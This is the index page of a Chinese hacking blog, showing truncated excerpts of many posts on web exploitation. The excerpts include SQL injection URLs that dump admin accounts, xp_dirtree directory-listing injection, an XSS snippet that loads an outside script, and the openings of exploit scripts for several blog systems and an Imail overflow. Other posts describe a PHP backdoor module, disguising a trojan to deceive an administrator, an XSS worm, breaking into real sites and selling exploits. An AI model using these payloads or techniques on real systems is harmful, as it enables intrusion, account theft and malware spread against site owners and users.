whytt's Blog

Developing A PHP Core Backdoor

文章作者：wofeiwo (wofeiwo_at_gmail.com) 目录1)前言2)优缺点3)设计4)功能实现5)参考文档6)一些说明1)前言PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现.由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个Backdoor.而且php支持使用dl函数动态加载模块的技术,这种类似linux等系统上的LKM机制让我们的Back 浏览全文...

21:56 | 评论 (2)

lbs blog又一注射漏洞含漏洞解析和exp

来源:http://www.loveshell.net/blog/blogview.asp?logID=224 source/src_trackback.asp中的注射 function trackbackSave(){var tbEntry={"log_id": input["id"],"url": input["url"],"title": input["title"],"excerpt": input["excerpt"],"blog": input["blog_name" 浏览全文...

13:58 | 评论 (0)

新云最新 2.1 SP1 Bug

PS:下面是以前写的，一字不动 - -！的发出来，错误地方请大家指正。我看的版本是2.1sp1 access的，网上免费下的^_* 动画：浏览全文...

21:00 | 评论 (1)

0day生成器一个

来源:剑心'blog http://www.loveshell.net/blog/blogview.asp?logID=205 最近见到到处有人YY啊,于是俺写了个脚本0day生成器,配置好的话一般的脚本都能扫描出"巨大的漏洞",用这个漏洞YY最好不过了,因为本人成功测试过包括vbb,sablog,phpcms,shopex,phpwind等等脚本,都是无一例外地通杀啊!一个人YY不如大家一起YY,所以发放脚本0day成成器一个,哈哈...... //By loveshell@ 浏览全文...

19:36 | 评论 (2)

新云网站管理系统最新版

来至:http://sobiny.cn/article.asp?id=1 受影响系统：新云网站管理系统最新版发现人的BLOG：http://sobiny.cn发现日期：2006年10月中旬发布日期：2007年6月上旬安全综述：新云网站管理系统是一个采用ASP和MSSQL等其他多种数据库生成静态页面构建的高效网站解决方案。漏洞描述：先看const.asp的GetUserTodayInfo过程。QUOTE:Lastlogin = Request.Cookies("newasp_net")("Las 浏览全文...

13:10 | 评论 (0)

浩方

哎..呀,好不容易有人陪俺玩魔兽,一进浩方,卡吧死机就叫了起来. - -! http://news.cga.com.cn/000/000/059/407.shtml 浏览全文...

12:19 | 评论 (3)

Wordpress admin-ajax.php远程SQL注入漏洞

受影响系统： WordPress WordPress 2.1.3不受影响系统： WordPress WordPress 2.2描述： BUGTRAQ ID: 24076WordPress是一款免费的论坛Blog系统。WordPress实现上存在输入验证漏洞，远程攻击者可能利用此漏洞执行SQL注入攻击非授权访问数据库。WordPress的wp-admin/admin-ajax.php文件没有正确验证对cookie参数的输入。在wp-admin/admin-aj 浏览全文...

9:04 | 评论 (1)

记录下

oblog如果按用户名(有的是按ID,这样就不成立了)来建立独立的文件夹来管理,那么可能被建立特殊用户名的.asp文件夹,条件是用于一些数据库整合了的站,比如说动易(米打.asp补丁,但不可以上传等)+动网+oblog,三者共用一个数据库,当然这里只是个比如,网站可能是其他程序+oblog,实站中仔细点,OVER~ 好久米记东西,冒下泡,天儿增是热鹅 &nbs 浏览全文...

13:40 | 评论 (0)

分析phpwind漏洞 [转]

猫猫传给我一个phpwind漏洞利用程序，可以直接在目录中写入一个木马。怎么说呢，这个漏洞是pinkeyes发现的，本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的，我还在冒虚汗中，同时pinkeyes 的睿智深深的打动了我，原来我才明白什么才是真正的技术含量。且听我慢慢道来：在程序运行时，我抓了一个包： GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=<?fput 浏览全文...

11:22 | 评论 (0)

WordPress wp-trackback.php漏洞分析|

WordPress wp-trackback.php漏洞分析文/Superhei 2007/1/91.Stefan Esser大牛2007/01/05发布的WordPress Trackback Charset Decoding SQL Injection Vulnerability [1] Code:wp-trackback.php $tb_url = $_POST['url'];$title = $_POST['title'];$excerpt = $_POST['excerpt' 浏览全文...

11:21 | 评论 (0)

PHP程序的常见漏洞攻击分析

不是固若金汤，随着PHP的广泛运用，一些黑客们也在无时不想找PHP的麻烦，通过PHP程序漏洞进行攻击就是其中一种。在节，我们将从全局变量，远程文件，文件上载，库文件，Session文件，数据类型和容易出错的函数这几个方面分析了PHP的安全性。　　如何通过全局变量进行攻击？　　PHP中的变量不需要事先声明，它们会在第一次使用时自动创建，它们的类型根据上下文环境自动确定。从程序员的角度来看，这无疑是一种极其方便的处理方法。一旦一个变量被创建了，就可以在程序中的任何地方使用。这个特点导致的结果就是浏览全文...

11:18 | 评论 (0)

记下一笔

记下一笔,document.write 输出<script src=1.js></script>不会覆盖原先的内容. 但如果被包含的js文件是不是本站的话,会被拦截............................... 浏览全文...

15:07 | 评论 (2)

无语

由2个图片引发的0day网马,今天群里有人居然喊8K...... 无语啊...... 随便找了个测试,搞定~!网马这东西,增滴好难卖噢浏览全文...

23:23 | 评论 (0)

牛B

牛B的世界,牛B的人,感叹下.......... 发生很多事情，让我大开眼界.....挖卡卡浏览全文...

22:53 | 评论 (1)

郁闷的一夜

今天搞一站点，拿到一个注入点，public权限。。。update密码进后台，后台为数字人程序后台，看了个通宵，实在是服了。。。没办法了，该杂办捏，哪位大锅来告诉小弟下，现在该杂办捏？？？怎么才可以拿到webshell呢浏览全文...

6:27 | 评论 (7)

最新动易的ODAY

最新动易的ODAY 来源:http://amxking.bokee.com/viewdiary.14881192.html 大致方法: 1.注册一个das.asp的用户名（会被系统自动建立一个以用户名为名字的目录）2.传图片马（主要是利用了03对.asp目录的支持，03下的.asp目录的特性引起的。官方也存在这个漏洞）3.注册.asp然后回主站 user/Upload.asp?dialogtype=UserBlogPic&size=5只能在03服务器下才可以~不然解析不了asp而且浏览全文...

17:53 | 评论 (3)

openrowset/opendatasource的其它技巧

openrowset/opendatasource的其它技巧Author：SuperHei_[At]_ph4nt0m.orgBlog：http://superhei.blogbus.com/Team：http://www.ph4nt0m.orgData: 2006-04-16前言：openrowset/opendatasource的应用大家应该很熟悉了，cadt[1]就是利用的openrowset，其实我们利用openrowset/opendatasource还可以做很多事情。一、函数原形参考：浏览全文...

15:21 | 评论 (0)

险啊

险啊，现在的数据库可不能乱打开，连数据库里都挂上了马，俺居然还被mdb溢出鸟，中了好几个马。。郁闷丫~~ 浏览全文...

0:41 | 评论 (3)

如何在NP下读写游戏内存及如何进入NP进程

标题: 【原创】如何在NP下读写游戏内存及如何进入NP进程作者: 堕落天才时间: 2007-01-04,13:28链接: http://bbs.pediy.com/showthread.php?threadid=37417*******************************************************标题:【原创】如何在NP下读写游戏内存及如何进入NP进程 **作者:堕落天才 & 浏览全文...

17:09 | 评论 (0)

bbsxp log注入

今天在群里看到有人在公布bbsxp0day，后来看了下，和我这个一样，也是log注入，sobiny大锅投稿后BBSXP就被传开了，555555555。俺每次都是还没拿站就被人拿去了。新云的也不会这样吧。。。上帝保佑~ 啊门。 ======================================================= bbsxpBy WhyTt参数直接带如查询的函数和过程 menuBBSListForumTreeLogShowRankShowRoleDelFile// 浏览全文...

15:43 | 评论 (5)

端口截听实现端口隐藏，嗅探与攻击

端口截听实现端口隐藏，嗅探与攻击创建时间：2002-11-05 文章属性：原创文章提交：flashsky (flashsky1_at_sina.com) 转载请注明原作者安全焦点在WINDOWS的SOCKET服务器应用的编程中，如下的语句或许比比都是： s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); saddr.sin_family = AF_INET; saddr.sin_addr.s_addr = htonl(INADDR_ANY); bind(s 浏览全文...

10:54 | 评论 (0)

无聊

今天上午上课无聊，继续看新云，又挖到3个注入点。汗啊。。。。可惜的是，很多站都改了后台地址，那位大大告诉偶，怎么方便找到Web目录。忘了在那里看的了，好象是邪八，说只要给塞外高人一个注入点，就可以拿到webshell，真是强啊~！！！佩服下。闪了。。浏览全文...

14:54 | 评论 (3)

QQ0day

刺老大发出来的，可惜我测试没成功，不知道是不是RPWT。 Tencent QQ 多个远程溢出漏洞by axis(axis_at_ph4nt0m.org)http://www.ph4nt0m.org摘要:QQ是由Tencent公司开发的一个IM软件，在中国有着非常广泛的用户。DSW Avert在200612.31发现了QQ的几个0day漏洞，并通知了QQ官方。QQ在2007.1.1进行了升级。事实上，在此之前，幻影旅团(ph4nt0m)的axis就已经发现了这些漏洞，出于一些原因未曾公布，现在漏浏览全文...

12:20 | 评论 (1)

出售几个exp

快过年了，出售几个程序的exp 雪人论坛2.0 bbsxp7.0 sp2 新云最新版本有需要的加我370728089 答案：花浏览全文...

14:01 | 评论 (1)

借用管理员的登录方式渗透

来源：http://www.mghacker.com/blogview.asp?logID=230 玫瑰Good! 前几天搞一个台湾一个排名两千多的站点,花费了不少时间,本以为是没戏的了,结果今天上肉机一看,跑了一周多的hash竟然跑了出来.然后接着搞了下去. 最重要的经验就是我们要有一个思想:管理员怎么进去的,我们就怎么进去. 这个站的渗透也比较慢长,花了一周多的样子.网站很偏僻的地方存在一个注入点,是db权限的,很遗憾不浏览全文...

17:12 | 评论 (3)

PHP安全配置

来源：http://www.0x54.org/liso/article.asp?id=8 PHP安全配置一、Web服务器安全 PHP其实不过是Web服务器的一个模块功能，所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全，这样就扯远了，无穷无尽。PHP可以和各种Web服务器结合，这里也只讨论Apache。非常建议以chroot方式安装启动Apache，这样即使Apache和PHP及其脚本出现漏洞，受影响的也只有这个禁锢的系统，不会危害实际系统。但是使用chroot 浏览全文...

11:40 | 评论 (0)

《十天学会PHP》

转网上一篇不错的《十天学会PHP》，对初学PHP的我们来说，这篇文章真的很不错。下面是原文：来自网络~ ：）以前写了十天学会ASP，十天学会ASP.NET什么的，现在想想再写个PHP吧，也算比较全了。 PHP的调试方法我这里就不说了，外面很多文章都有介绍，也有很多不同的组合。我这里暂时是以 Apache web server 和 MY SQL 作为WEB服务器和数据库，在php-4.3.3下的环境做的程序。当然要简单的构建和访问查看数据库 PHPMYADMIN 不可少。& 浏览全文...

22:09 | 评论 (0)

Apache最新安全漏洞与利用

转至红狼：http://www.wolfexp.net/forum/viewthread.php?tid=3192&extra=page%3D1 Apache最新安全漏洞与利用Bug Find By Cooldiyer @ 2006/12/13 15:05描述: 任意以.php开头的文件名，Apache都当做php文件解析如".php.comment"将被当做php文件解析,由此引发一系列漏洞.MG2是在国外非常流行的一个PHP+HTML的图片管理程序，由于商业版被破解，程序流传甚广，浏览全文...

18:01 | 评论 (2)

红色警报

Microsoft Windows文件名单处理本地权限提升漏洞（MS06-075）受影响系统： Microsoft Windows XPMicrosoft Windows 2003 Microsoft Outlook Express地址簿处理远程任意指令执行漏洞（MS06-076）受影响系统：Microsoft Outlook Express 6.0Microsoft Outlook Express 5.5 SP2 Microsoft Windows远程安装服务远程任意指令执行漏洞（MS06 浏览全文...

10:47 | 评论 (0)

常用到的WebShell提升权限思路3则

议题作者：风蓝信息来源：邪恶八进制信息安全团队（www.eviloctal.com）以下几个思路多半运用在韩国服务器和管理员身上.1.这个思路只是针对一些品牌服务器的,像Dell,Compaq(暂时只发现这2个),由于这种品牌的服务器一般都有自身的服务,又由于一般这些服务程序所在的目录都是默认权限,所以我们可以利用webshell的更改文件名和上传文件名轻松将木马上传上去后等待服务器的下次重启运行.思路里提到的具体文件名大家可以自己找一下,因为有些服务器的文件名不太一样,我手上也没有现成的she 浏览全文...

9:51 | 评论 (0)

进步

为了进步，为了接触新的东西，小弟建了个群，欢迎来交流和讨论技术。说到建这个群，其实是最近遇到很多问题，当然新的想法和思路必然会带来许多问题，比如最近会很火的arp挂马，还有lake2猜想的实现，upfile除了用 00截断符还有什么方法可以代替。。。。等虽然只是想法和思路，但是要一个人来做真的是很麻烦，不是小弟很懒，而且很多事一个人做是很累很累的。。 =_*! 如果你也和我一样，有很多大胆的想法和思路想和人分享，讨论，那么请加下4824425群，当然您也可以留下QQ号或m 浏览全文...

13:50 | 评论 (7)

Exploit For Last Boblog version

来源：http://www.loveshell.net/blog/blogview.asp?logID=146 小M找到的漏洞,被人传出去了,然后官方就不管bloger的死活要求升级.........发布补丁还是有漏洞的拿来YY一下...... <?ini_set("max_execution_time",0);ini_set("default_socket_timeout",5);$data ='nowonline[]=< 浏览全文...

18:55 | 评论 (0)

Exploit For F2blog

来源：http://www.loveshell.net/blog/blogview.asp?logID=147 官方的人好牛啊,呵呵,硬要说程序没问题,服务器有问题,不鸟啦~~~~~不过后台做得实在很好Exp 拿来 YY一下,顺便说句,漏洞不只这一个挖 <?phpprint_r("+------------------------------------------------------------------+Exploit For F2Blog All Versio 浏览全文...

18:54 | 评论 (0)

SQL注入Access导出WebShell？

来源：http://blog.csdn.net/lake2/archive/2006/11/23/1409132.aspx?Pending=true 已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了，也只是听说而已，具体的细节还是不得而知。最近在看的书中一章提到Jet的安全，然后灵光一闪，呵呵，发现了一种可以利用access导出asp的方法，分享之。几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件（可导出txt、htm 浏览全文...

14:55 | 评论 (5)

问题

发现有很多人对access版本的动易搞不明白，于是今天写个简单的，其实就是基本的注入语句。 http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1 先暴所有管理员帐号。 adminhahawhytt 然后 http://127.0.0.1/Region.asp?Co 浏览全文...

10:08 | 评论 (15)

也谈一个跨站的利用

来源：http://www.ph4nt0m.org/bbs/showthread.php?s=&postid=83894#post83894 也谈一个跨站的利用1.方法：网易同学录留言功能存在跨站，这里演示一个利用它把自己加为班级管理员的方法。在留言框里填写：Codz: +++try%20%7B%0D%0A%09var%20as%20%3D%20document.getElementsByTagName%28%22a%22%29%3B%0D%0A%09var%20f 浏览全文...

19:11 | 评论 (0)

又一动易0day

哇哈哈，昨天看到动易出补丁了，甚是郁闷，俺拿到这个0day都还没开始玩，就这样被洗白鸟，郁闷啊，早知道不玩动易主站，而且是get提交方式，当初如果听CN的话，也许这个0day还会一直埋在地下，刚看了下动易的补丁，这次补的地方不至这一个，哈哈，传说的7个以上的bug，不知道还省几个呢？下面是大概一个月前写的东西，发出来给大家搞一些懒惰的管理员，补丁都发2天了，还没补的话，就是管理员的错了哦，呵呵~~~38也还没补哦，要上的就快上，哈哈~~~ 文章标题：动易最新未公开Bug文章作者：WhyTt漏洞浏览全文...

14:52 | 评论 (15)

0day耶

今天晚上发0day耶，就公布在这里耶。。。。。。噢耶~~呵呵浏览全文...

12:37 | 评论 (0)

win2000单网卡创建vpn服务器

来源：http://www.mghacker.com/blogview.asp?logID=202 玫瑰山庄 vpn对于玩黑的人来说好处太多,就不用说了.今天遇到一高速台湾肉机,通过千幸万苦拿了个webshell,还好,它装了pcanywhere的,当然下cif文件,把用户和密码读出来,连接上去ok.发现速度还不错,可pcanywhere的画面就是没有3389的爽,于是开了个3389,主要是我想建个vpn服务器,这么高速的服务器不建vpn可惜了,ping的返可是180.当我建vpn的时候才发浏览全文...

18:44 | 评论 (0)

PHP的is_uploaded_file()和move_uploaded_file()函数windows环境饶过缺陷

又见剑心的文章，又让我们这些初学者长了不少见识，：）感谢剑心来源：http://www.loveshell.net/blog/blogview.asp?logID=139 PHP的is_uploaded_file()和move_uploaded_file()函数windows环境饶过缺陷BY 剑心在早期的PHP版本中，上传文件很可能是通过如下的代码实现的： ...... if (isset($_F 浏览全文...

15:21 | 评论 (0)

preg_replace+/e漏洞

前天看剑心的一篇文章，也是preg_replace+/e漏洞，发现PHP的漏洞和ASP的简直大不一样鸟，最近虽然自己才开始学习PHP，但是由于强烈兴趣还是大胆的看了许多PHP的漏洞分析文档，当然，很多地方不理解。大虾教我 ^ ^ 来源：http://www.xfocus.net/articles/200605/866.html创建时间：2006-05-03文章属性：原创文章提交：HeiGe (hack-520_at_163.com) ipb search.php 漏洞分析及思考 A 浏览全文...

22:27 | 评论 (0)

CNTinK

不知道CNTinK那小子怎么样鸟，好久没上网鸟，刚才把昨天脱的没更新的exp更新完。哈哈，偶是不是有点懒？希望他早点安排好一切，重装上阵！：）浏览全文...

14:18 | 评论 (0)

PHP 中的一些经验积累

来源网络 1、关于PHP重定向方法一：header(\"Location: index.php\"); 方法二：echo \"<script>window.location =\\\"$PHP_SELF\\\";</script>\"; 方法三：echo \"<META HTTP-EQUIV=\\\"Refresh\\\" CONTENT=\\\"0; URL=i 浏览全文...

14:17 | 评论 (0)

PHP初学者头疼问题总结

PHP初学者头疼问题总结来自：csdn【1】页面之间无法传递变量 get,post,session在最新的php版本中自动全局变量是关闭的，所以要从上一页面取得提交过来得变量要使用$_GET[\'foo\'],$_POST[\'foo\'],$_SESSION[\'foo\']来得到当然也可以修改自动全局变量为开(php.ini改为register_globals = On)；考虑到兼容性，还是浏览全文...

14:16 | 评论 (0)

正则学习报告

转载:phpe.net 正则表达式的基本语法首先让我们看两个特殊的符号'^'和'$'。他们的作用是分别指出一个字符串的开始和结束。例子如下："^The"：表示所有以"The"开始的字符串（"There"，"The cat"等）；"of despair$"：表示所以以"of despair"结尾的字符串；"^abc$"：表示开始和结尾都是"abc"的字符串——呵呵，只有"abc"自己了；"notice"：表示任何包含"notice"的字符串。象最后那个例子，如果你不使浏览全文...

10:22 | 评论 (2)

Curl详解

来源：http://www.caisong.com/read.php/209.htm#topreply 官方主页：http://curl.haxx.se/ 直接下载：http://curl.haxx.se/download/curl-7.16.0-win32-ssl-sspi.zip 源码下载：http://curl.haxx.se/download/libcurl-7.16.0-win32-ssl-sspi.zip 呵呵~~这样写起方便大家哇。：） Curl详解CURL 浏览全文...

9:54 | 评论 (0)

新云小漏洞发现

信息来源：红狼安全小组（www.wolfexp.net）文章作者：阿呆最近玩新云时，在COOKIE欺骗的时候，经常会遇到已经有管理员在线，不允许多用户同时登陆，导致进不了后台，拿不了webshell，很是郁闷，下了新云的源码回来看了下。在admin_login.asp文件里发现了个小问题，一起来看看（由于小弟ASP算不上入门，仅简单分析下，出错了别拿番茄炸我）： Sub logout() '清除COOKIES中管理员身份的验证信息. Sess 浏览全文...

21:06 | 评论 (0)

VPN常见出错问题的解决

来源：Linzi's blog VPN常见出错问题的解决一废话篇:对于VPN的好处,用过的人都知道,一个是安全,一个是提速(依环境而定),另外在渗透,还有其它很多方面都有无法形容的好处.自己接触VPN也有一段时间了,底层的东西只是懂皮毛,但架设问题常见的问题也都碰到了,这里提出一些常见问题的解决方法,如果大家有碰到没法解决的,请把问题贴出来,我尽自己所知来解决.但问协议方面的,还是算了二架设篇:对于这个可以见我以前做的一篇动画:http://soft.cncnet.org/vpn.h 浏览全文...

20:22 | 评论 (0)

风讯4.0未公开Bug

文章标题：风讯4.0未公开Bug文章作者：WhyTt漏洞发现时间：2006年10月24日个人Blog：http://why_tt.mblogger.cn //个人个人Blog：http://whytt.mblogger.cn //技术影响版本：ACCESS和MSSQL 补充一句，这个东西只是看代码时随便看到的一处，其他地方还多着呢，当时写下来还没测试，我就记了下来，其中有什么不对，还望理解。哈哈~ 前段时间网上流行的SQL注入是利用伪造代理IP来实施攻击，这个HTTP_X_FOR 浏览全文...

19:48 | 评论 (12)

Php5 GPC绕过缺陷

Php5 GPC绕过缺陷1 创建时间：2006-08-07文章属性：原创文章提交：T_Torchidy (jnchaha_at_163.com) 在讨论具体的缺陷之前我们先来了解一点php安全方面的小东西。magic_quotes_gpc选项是php中的一个重要的安全设置，当该选项为ON也就是打开的时候，所有从GET，POST，COOKie传递过来的数据中的'，"， \，以及NULL等元字符都会被自动的加上\实现转义，这个选项使得Sql注入或者插入代码以及XSS中引入字符串或者改变程序流程变浏览全文...

19:27 | 评论 (0)

突破空格的限制

突破空格的限制 -- 寂寞的刺猬 [LOVESHELL]关于空格，有许多替换方式，比如TAB空格，SQL数据库中的/**/，但我又找到了另一种替换方式，已发表于《黑客手册》2006.7期中，这里挑其精华，现一下吧！对于SQL语句，大家还都习惯于其的空格，比如select id from [name]，如果中间没有了空格，那就成了selectidfrom[name]，一滩糊涂！除了上面所说到几个空格的替代方法外，我发现用()括号在SQL中一样可以运行，比如上面的语句，就可以写成，select(i 浏览全文...

16:17 | 评论 (0)

ASCII

ASCII 维基百科，自由的百科全书。 ASCII（American Standard Code for Information Interchange，美国信息互换标准代码）是基于罗马字母表的一套电脑编码系统。它主要用于显示现代英语和其他西欧语言。它是现今最通用的单字节编码系统。 [编辑] 控制字符二进制十进制十六进制缩写可以显示的表示法名称/意义 0000 0000 0 00 NUL ? Null charac 浏览全文...

15:17 | 评论 (0)

[补全]偶对PHP文件包含漏洞的初步认识

来源：Loveshell [菜鸟制作高手略过]经常听到PHP文件包含漏洞,前一阵子贱心发现的BO-BLOG漏洞就是文件包含漏洞,可以用来执行一些命令,这个文件包含到底是怎样形成鸟?可以简单的理解为乱用include(); $id=$_GET["id"];include($id);稀里糊涂的就把$id这个变量给引用了,但是不要单纯的理解为这个漏洞就是include了变量,include了文件也是有可能利用的,这个稍后在做介绍.首先做个简单的测试,让大家初步了解下文件包含BUG(提浏览全文...

8:18 | 评论 (0)

FCKeditor系统拿webshell

来源：http://www.secow.com/blog/article.asp?id=254晚上和宝看个台湾的站,后台套用的是FCKeditor的系统.这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用再入侵的时候,宝发现的心得我记录下:http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/con 浏览全文...

16:49 | 评论 (0)

Imail 8.13 8.15 RCPT溢出 exp

#!/usr/bin/perl -w # Code by 云舒,ph4nt0m.org,Thx LuoLuo# Test Imail 8.13 8.15 on win2000 and win2k3+sp1 chinese version.# Dou you know who is icy? ^_^ use strict;use IO::Socket; if( @ARGV != 2 ){ print "\nCode by 云舒,ph4nt0m.org,thx luoluo\n";& 浏览全文...

17:33 | 评论 (2)

新云系统下载任何文件漏洞分析

注明下：在漏洞没公布前就写的文档，给自己定了个格式，这样样子好看些，大虾们不要看错了，漏洞发现者是朋友滴朋友,不是本人.写文档只是注明漏洞的分析过程，这个过程是自己看代码写的。OK？ OK！ hehe~ 文章标题：新云系统下载任何文件文章作者：WhyTt影响版本：ACCESS和MSSQL漏洞发现者：朋友滴朋友,不是本人. 我只是做下漏洞分析，写出文档方便自己。：）在看到这个0day后，看了下这个出问题的downfile.asp文件。 url = Replace(Replace(Repl 浏览全文...

17:26 | 评论 (0)

SQL列目录

今天终于把一个SQL的问题解决了，现在想想自己真是傻，哈哈下面来说说列目录 DROP+TABLE+WhyTt_Tmp;CREATE+TABLE+WhyTt_Tmp(subdirectory+nvarchar(256)+NULL,depth+tinyint+NULL,[file]+bit+NULL);DELETE+WhyTt_Tmp;+Insert+WhyTt_Tmp+exec+master..xp_dirtree"C:\",+1,1;-- 这个命令就是把c:\的目录和文件名都存入WhyT 浏览全文...

17:26 | 评论 (3)

狂晕BCT

我倒，BCT又来公布动易的漏洞，我工具都还没写完，只怪自己对SQL不打熟，好几天了遇到一个问题到现在还没解决，my噶，测试官方一样xx。浏览全文...

12:35 | 评论 (6)

动易2006SP4利用程序

动易漏洞是BCT发现的，我们根据一个图片看到漏洞文件，然后找到利用方法。就这样很简单。工具只是觉得以前发布的那个看上去不是很方便，于是自己就写了个，方便自己，也方便大家而已，本来昨天将这个东西传给到了trace的群共享，没想到今天已经在网上看到这个东东老，于是刚才改了改，换个新的面目出来见见大家。加了一个停止按钮，以前忘老，哈哈~~~8好意思。提供下载吧。由于这里不提供传rar文件，就直接改了下后缀，把下面图片地址另存为rar格式，再解压就可以了。：） htt 浏览全文...

17:27 | 评论 (0)

利用log备份获取WEBSHELL

利用log备份获取WEBSHELL 作者SWAN Blog被人渗透了一下，不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来，那次我掉了一个小东西，然后今天别人告诉我NBSI 3用了那个东西的方法……呵呵，有点晕，就是下面的，成功率还是很高的，大家可以试试看。嗯，方法流出去无所谓，文章留着吧。 dbowner通过注射得到一个shell应该不是什么难事情了，比较麻烦的是就算利用增量备份，仍然有很多不确定的因素，如果之前别人浏览全文...

21:42 | 评论 (0)

动易SP4的漏洞利用

今天BCT把动易SP4的漏洞公布了，既然都公布了，那么还是发出来吧！在NewComment.asp文件中 ModuleName = Trim(request("ModuleName")) 这个ModuleName变量没过滤好，从而导致，我们可以在下面的SQL语句中构造我们的SQL语句 If ModuleName <> "" Then If ChannelID <> 0 Then & 浏览全文...

18:40 | 评论 (0)

PhpWind论坛存在严重跨站和注入漏洞

适合读者：脚本爱好者前置知识：PHP基本语法漏洞文件：register.php、sendpwd.php影响版本：PhpWind 4.0.1－4.3.2测试版本：PhpWind 4.0.1测试环境：WindowsXp Professional SP2 + MySQLPhpWind论坛存在严重跨站和注入漏洞文/图孤烟逐云【江苏大学信息安全系】 PhpWind是由国人开发的一套基于Php+MySQL 的论坛系统,由于出色的性能发挥和界面的美观以及众多的插件支持赢得了普遍的赞誉, 浏览全文...

15:32 | 评论 (0)

根据补丁文件分析的动力文章系统2005的漏洞

漏洞级别：严重解决方案：（临时）一、用提供的补丁包中的两个文件替换系统中的文件。二、开启后台管理验证码：Admin_ChkCode.asp文件中将EnableSiteManageCode设置为True，并修改SiteManageCode的默认值。三、最好可以开启前台用户操作部分的审核功能，比如文集的审核等。四、注意检查系统管理员中是否有非法的管理员帐号。//*********************** 原文件删除函数 *********************Sub Del()Dim Auth 浏览全文...

14:56 | 评论 (0)

当我站在起点时

今天在次打开nuoya时候，无意中看到当我站在起点时的href成了http://www.baidu.com/....，一点，晕，原来网上有人收录了这篇文章，哈哈，说实在挺搞笑，想起以前自己看这篇文章的时候。（猥琐的zeta，不过挺搞笑的）下面是原文，一起来解读小zeta的世界吧。哈哈 =。= ============================================================= 当我站在起点时当我站在起点时（一）终于辞职了，花尽了我的心思后终于做浏览全文...

20:19 | 评论 (0)

Good x-door

Good x-door 一款新的远控作者主页：www.xdoors.net 当前下载 X-firewalk [3.0] X-door [F321] 浏览全文...

16:16 | 评论 (0)

wish.php远程包含文件漏洞

今天看网上传的火热的wish.php远程包含文件漏洞，至于漏洞原理，可以百度下。看到好多利用工具，我汗。。。什么by什么，什么by什么的，至于吗？界面做的也实在是难看，还到处发。一看就是vb做的。其实手工更简单。下面是我用的方法。把下面代码，放在一个web服务器上，地址如：http://www.xx.com/pp.txt <html><head><title>上载文件表单</title></head& 浏览全文...

18:41 | 评论 (0)

网络红娘

今天在幻影上看到网络红娘的作者发布了网络红娘最新vip2006版本，于是呼，down了下来，后来测试越来越不爽，发发闹骚。首先：为什么生成服务端，总是要和www.newying.com建立连接而去上面down file，不可以把file和客户端放在一起吗？如果有一天（假设）作者把这个生成服务端的file换换，改改，那么。。不是就。。。方正觉得不爽，作者也不要怪偶，偶中毒中多了，常在网上走，多个心也未必不好，您说呢？其二：生成完的服务端运行后，为什么还要和www.newying 浏览全文...

11:02 | 评论 (0)

SOHU BLOG XSS worm全部完成

来源:http://s0n9.blog.sohu.com/10806738.html 首先我已经在《XSS worm初尝试》这个帖子里详细说明了SOHU这个XSS漏洞.这个漏洞要写出XSS worm有两个限制：1.XSS代码长度限制，不能超过2000字符。分析：写成JAVACRIPT后需转HTML编码十进制，一小段便超过2000字符了。2.“域权限”限制。分析：XSS worm的POST数据相关代码不能从站外调用，通俗点讲就是不能站外提交数据，包括调用外部JS用docu 浏览全文...

18:48 | 评论 (1)

普通文件的欺骗手法

有一个很想拿到权限的论坛，突然看到管理员征集XX资料的照片，并开放了一个FTP上传，于是想到了捆绑木马文件欺骗管理员的方法。我习惯用windows自带的IEXPRESS捆绑文件，捆好了文件后用Restorator改个图标，如图把其他的资源全部删除，只剩下RCData和图标，如图保存后这样就得到了一个有文件夹图标的捆绑EXE文件，把这个文件的名字改为图片.exe,同时.exe后缀前加很多空格，如图最后得到下图这样的效果,把这个文件打包成RAR文件，直接传浏览全文...

18:44 | 评论 (0)

利用Microsoft.XMLHTTP控件发送COOKIE[转]

跨站脚本攻击想必各位都已经是很熟悉了，但是得到COOKIE的时候一直有一个问题：总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE，这样隐秘性就大打折扣了。以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句的办法勉强可以作到发送COOKIE不出现IE窗口，但是在实际使用中有时会遇到IE出错。没有更好的办法了吗？以前在研究VBS病毒自动升级的时候用到一个Microsoft.XMLHTTP控件(该控件是WIN98/2K上都默认自带的东东,并且浏览全文...

18:28 | 评论 (0)

如何让动态插入的javascript脚本代码跑起来

首先，声明方法很多种，直接间接的方法都有，只罗列一般情况下的两种模式：假设我们要装入的代码是a.js：var foo=function(){document.write("I am a.js content foo() function");};一。直接插入src，这种方法简单而直接，但有局限性，1） <script>var x=document.createElement("SCRIPT");x.src="a.js"; x.defer=true;document.getElem 浏览全文...

18:25 | 评论 (0)

web攻击步骤图

18:19 | 评论 (0)

expression&eval跨站的一个方法

expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程. 我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行. <img src="#" style="Xss:expression(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,3 浏览全文...

18:09 | 评论 (0)

在XSS中如何再插JS

在XSS中如何再插JS 来源：http://s0n9.blog.sohu.com/16234577.html <img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img> 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前 <img sr 浏览全文...

17:54 | 评论 (0)

网络渗透技术

今天看网络渗透技术，在第9章中有关于cookies和session的伪造，cookies还说的过去，哈哈，原来连session也可以伪造，看了方法，觉得不是很难。要关灯鸟，改天试了再写写。浏览全文...

22:49 | 评论 (2)

杯子和水的爱情故事

